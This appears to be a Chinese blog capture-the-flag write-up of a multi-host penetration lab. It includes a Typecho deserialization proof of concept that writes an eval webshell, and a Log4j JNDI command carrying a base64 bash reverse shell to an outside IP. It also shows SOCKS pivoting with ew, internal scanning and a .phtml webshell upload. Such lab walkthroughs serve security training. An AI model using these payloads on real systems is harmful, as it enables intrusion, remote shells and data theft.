typecho和emlog/typecho漏洞-新手网络安全入门教程

于 2024-06-25 18:21:43 发布
阅读量271 收藏 8
点赞数 5
文章标签: 代理 目录 仓库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/saystan/article/details/139966263
版权

typecho和emlog/typecho漏洞-新手网络安全入门教程

BugKu-PAR-渗透测试2

注:这是在做完靶场几天后做的wp,环境都已经没有了,只能纯靠文字讲述,但基本思路都写出来了,按照这个思路做是没什么问题的

扫描发现.git源码泄露

使用下载下来,查看文件发现是,存在一个反序列化漏洞可导致命令执行

<?php
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();
    public function __construct()
    {
        $this->_params['screenName'] = "echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+|base64 -d > 2.php";
        $this->_filter[0] = 'system';
    }
}
class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    /** 定义ATOM 1.0类型 */
    const ATOM1 = 'ATOM 1.0';
    /** 定义RSS时间格式 */
    const DATE_RFC822 = 'r';
    /** 定义ATOM时间格式 */
    const DATE_W3CDTF = 'c';
    /** 定义行结束符 */
    const EOL = "\n";
    private $_type;
    private $_items = array();
    public $dateFormat;
    public function __construct()
    {
        $this->_type = self::RSS2;
        $item['link'] = '1';
        $item['title'] = '2';
        $item['date'] = 1507720298;
        $item['author'] = new Typecho_Request();
        $item['category'] = array(new Typecho_Request());
        $this->_items[0] = $item;
    }
}
$x = new Typecho_Feed();
$a = array(
    'host' => 'localhost',
    'user' => 'xxxxxx',
    'charset' => 'utf8',
    'port' => '3306',
    'database' => 'typecho',
    'adapter' => $x,
    'prefix' => 'typecho_'
);
echo urlencode(base64_encode(serialize($a)));
?>

写马,蚁剑连接在根目录发现flag,在web目录下还存在admin.ini.php文件,里面存放着数据库的账号和密码,使用蚁剑插件连接在数据库中发现flag

开始打内网,查看/etc/hosts确定下一目标地址

cat /etc/hosts

通过蚁剑上传ew搭建代理

kali执行:(在本地起了一个端口为1010的代理)

./ew_for_linux64 -s rcsocks -l 1010 -e 7777

蚁剑执行:

./ew_for_linux64 -s rssocks -d kali地址 -e 8888

连接成功后,kali那边会回显ok

利用蚁剑上传fscan扫描内网并将结果保存到a.txt中

fscan -h 内网地址 > a.txt

扫到一个web站点,访问是一个登录框,点击登录时会在返回头中提示源码文件名

下载源码解压可以看到是log4j,那就很明显了就是打log4j

使用vps起一个jndi服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80OS4yMzQuNTYuMjAwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "49.234.56.200"

那段编码内网就是要执行的反弹shell命令,把反弹地址和端口换成自己的并开启监听

之后在那台存在log4j的靶机上执行

${jndi:rmi://119.91.32.206:1099/fv304f}

rmi://119.91.32.206:1099/要根据你的jndi服务来填写

执行成功后会弹回来一个shell是root权限,在起根目录和root目录下都存在flag文件,在根目录下还存在一个start.sh文件,查看该文件可以发现是把flag写到了js文件中,查看js文件得到flag

接着在这台log4j的机器上执行cat /etc/hosts寻找下一目标地址

cat /etc/hosts

也可以通过 ip add等方法查看ip地址

确定好下一目标地址之后,就要设置代理了,kali开启web服务

python3 -m http.server

将ew放到这个临时web目录下

在目标机器上使用wget下载ew

wget http://0.0.0.0:8000/ew_for_linux64

为了信息收集,在把fscan下载了

wget http://0.0.0.0:8000/fscan_amd64

接下来设置代理

kali执行:

./ew_for_linux64 -s rcsocks -l 1000 -e 8888

在本地的1000端口上起了个代理

靶机执行:

./ew_for_linux64 -s rssocks -d kali地址 -e 8888

执行成功后kali那边会回显ok,此时代理已经搭建好,下面就利用fscan信息收集确定好攻击目标

./fscan_amd64 -h 目标地址段

扫到了192.168.1.3,火狐浏览器设置代理,此时的代理就不是第一个ew代理了,而是第二个也就是端口为1000的代理地址

访问192.168.1.3,开启了web服务,里面的功能就类似于你输入一个仓库地址,他就会给你clone下来,然后你可以访问他clone后的文件

在clone仓库的过程中也会clone仓库中的文件,也不免可以猜到在仓库里放置一个一句话木马,在它clone后去访问,但是正常的.php后缀是不会执行,经过测试后发现.phtml是可以被执行的

在仓库中编写一个.phtml后缀的一句话木马文件,输入仓库地址,他clone后直接访问就,在根目录发现flag

接下来还是一样的套路查看网卡信息,kali开启web服务,靶机下载fscan扫描,下载ew设置代理,需要注意的是代理地址记得要改变否则会被占用,就会代理搭建失败

fccan扫描

./fscan_amd64 -h 目标地址段

设置代理

kali执行:

./ew_for_linux64 -s rcsocks -l 1040 -e 9999

此时的代理端口就是1040

靶机执行

./ew_for_linux64 -s rssocks -d kali地址 -e 9999

最后两个flag给了两个提示分别是guest和 /,通过fscan扫描也可以发现内网有台主机开放了21ftp服务

账号密码都是guest,ls发现flag,get flag下载下得到第七个flag

切换到跟目录 cd /下载根目录中的最后一个flag

至此flag全部拿到!

~

网络安全学习,我们一起交流

~

程序员六七
关注
typecho install.phpl漏洞分析
le31ei的博客
12-06 880
漏洞出了很久了一直没时间分析,现在有空记录下分析流程,学习下php反序列化的知识。
Typecho开启emoji表情支持功能
YiferHuang 的博客
01-21 1983
通过修改数据库编码格式使得Typecho支持emoji 个人博客同文链接【开启评论邮件通知,回复便捷】:https://www.yifer97.cn/tech/emoji.html 1.整理数据库编码 进入PHPmyadmin,选择 Typecho所使用的数据库 【操作】–&amp;gt;【整理】–&amp;gt;【选择utf8mb4_unicode_ci】 2.运行sql语句修改数据库编码 alter...
Typecho 深入理解PHP反序列化漏洞
Fly_鹏程万里
09-17 1032
前言 Typecho是一个轻量版的博客系统,前段时间爆出getshell漏洞,网上也已经有相关的漏洞分析发布。这个漏洞是由PHP反序列化漏洞造成的,所以这里我们分析一下这个漏洞,并借此漏洞深入理解PHP反序列化漏洞。 一、 PHP反序列化漏洞 1.1 漏洞简介 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。...
Typecho重大漏洞
qq_43676541的博客
04-15 369
#简介 Typecho是一个基于PHP的博客软件。Typecho是在GNU通用公共许可证2.0下发布的。 Typecho在1.1版本中存在反序列化漏洞,当系统未安装的情况下,攻击者可以利用ins
Typecho框架漏洞
weixin_62693307的博客
11-19 482
这里说的漏洞是xss漏洞,学过渗透的应该都学过,我在这里就不过多阐述了,下面我们直接进入正题。然后再次访问时即可弹出一个框,这里学过xss漏洞的应该知道是什么意思了。这里说的框架漏洞只适用于1.2.0版本及以下的版本。然后等管理员访问评论是会使得js文件也给运行起来。然后这里就像上面反弹xss代码一样书写网址。生成的一句话目录路径可以自己改,上面的如下。在404.php中,这样路径的问题就解决了。这样我们就可以用蚁剑或其他工具连接后台了。
TypechoCMS反序列化漏洞(CVE-2018-18753)
m0_57379855的博客
03-12 1379
TypechoCMS反序列化漏洞(CVE-2018-18753Typecho反序列化漏洞php-pocpython-poc Typecho反序列化漏洞 PHP版本:5.4.5nts(PHPStudy) 在数据库新建一个数据库typecho 只要传一个不存在的成员变量,就会触发_get()魔法函数 使用_get()调用applyFilter() call_user_func() 可以执行任意命令,包括写入文件 php-poc python-poc 重点函数 ...
emlogtypecho文章采集插件-简数第三方数据采集.zip
11-10
简数采集平台使您能够轻松的获取大批量网页数据。任何人都可以获取想要的网页数据,您只需在浏览器的可视化界面上用鼠标点击即可实现,不需要懂Html代码!
emlog添加功能-日志分享,评论gravatar头像,快捷回复修改方法
09-28
这些改进将使你的Emlog博客更具互动性和吸引力。 首先,我们来看日志分享功能的实现。日志分享允许读者将你的文章轻松地分享到各种社交平台,从而增加你的博客的曝光度。要添加这个功能,你需要找到一个分享按钮的...
yoniu:TYPECHO原创模板
05-01
Yoniu本是EMLOG模板,后来应众人请求,所以出了TYPECHO版本! 介绍 Yoniu是一款基于BOOTSTRAP3的双栏原创主题,清新简洁,自适应。 主题特色 头部采用透明的bootstrap祖传导航样式 顶部封面图设计(可自行修改) 可...
社工资源整理
热门推荐
weixin_30865427的博客
07-16 1万+
CMS 1 Tncms 2 Discuz-6 3 phpvod 4 Website Creator 5 微信达微信数字投票管理系统 6 Stackla Social Hub 7 Banshee 8 mymps 9 Kolibri CMS 10 AnanyooCMS 11 ILAS网上图书馆 12 Destoon ...
typecho_1.0_14.10.10_unserialize
weixin_43886198的博客
12-21 795
typecho_1.0_14.10.10_unserialize 漏洞描述 typecho 是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。 漏洞危害等级 高危 影响版本 typecho1.0(14.10.10) 漏洞复现 基础环境 组件 版本 OS Win10 Webserver MAMP PRO _PHP5.6.37 typecho 1.0(14.10.10) 网站安装 需要进入数据库创建一个typ
typecho_1.0_14.10.10_反序列化_漏洞
weixin_42786460的博客
09-10 263
typecho_1.0_14.10.10_反序列化_漏洞
Typecho install.php存在的反序列化漏洞
王三三
11-30 1672
0x00 前言很久没有在安全方面折腾,突然收到“爸爸云”的短信,“您的服务器xxx.xxx.xxx.xxx存在网站后门,为防止黑客进一步入侵,请登录进行查看和处理”。当时正在出差,手头没电脑,草草看了一眼没来得及处理,最近得空研究了研究。常在河边走,哪有不湿鞋,网上已经有该漏洞的详解,仅以此文记录对反序列化漏洞研究的一个学习过程。0x01 漏洞复现使用工具:1、Firefox浏览器+HackBar插
16-PHP代码审计——Typecho1.0.14反序列化漏洞
网络安全
05-26 1164
漏洞受影响版本: Typecho_v1.0.14以下 环境: php5以上 Typecho_v1.0.14.tar poc: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1O
Typecho反序列化漏洞分析
qq_41891666的博客
07-06 1516
0x01 环境准备 首先 git clone 到本地,然后phpstorm 打开, git reset hard 到漏洞修复之前的commit 0x02 审计 首先在install.php 开头就做出了两个判断,需要finish 参数以及refer头要是本站的值 核心漏洞处: 第一行直接反序列化Typecho_Cookie::get(’__typecho_config’),没有进行任何过滤 跟进Typecho_Cookie::get() 函数 发现此函数是用来取cookie 中的值的,但是如果对应
漏洞复现篇——Typecho反序列化漏洞
爱国小白帽
03-03 5214
实验环境: PHPstudy 火狐浏览器 Typecho 填好数据库密码和你的登录密码就可以了 安装时会报错,因为无法自动创建数据库,需要使用CREATE DATABASE typecho default charset utf8;语句手动创建数据库 ...
typecho反序列化漏洞(详细过程)
qq_61991235的博客
03-13 1810
typecho反序列化 菜鸡的第一条链子,酌情参考 搭建环境 利用phpstudy+phpstrom搭建环境调试(注意php版本大于5.4) 开始 漏洞起始点 前提:get方法传?finish=1,refer=http://127.0.0.1 若不设置的话exit,程序结束 详细看install.php前面部分的代码 <?php $config = unserialize(base64_decode(Typecho_Cookie::get('__typecho
Typecho-反序列化漏洞学习
weixin_34279246的博客
04-30 406
目录 Typecho-反序列化漏洞学习 0x00 前言 0x01 分析过程 0x02 调试 0x03 总结 0xFF 参考 Typecho-反序列化漏洞学习 0x00 前言 补丁: https://github.com...
Typecho代码审计-反序列化漏洞复现(超详细!!!)
最新发布
小小小屿屿屿的博客
12-27 2609
本文以Typecho为靶场,通过代码审计,复现了反序列化的漏洞
DearLicy小清新博客主题发布 - 高度兼容Typecho
- **安全性**: 在安装任何第三方主题或插件时,应考虑安全性,检查是否有安全漏洞或不良代码。 - **个性化定制**: 用户可以进一步通过编辑CSS、HTML或JavaScript代码来自定义主题的外观和功能,达到真正的个性化需求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值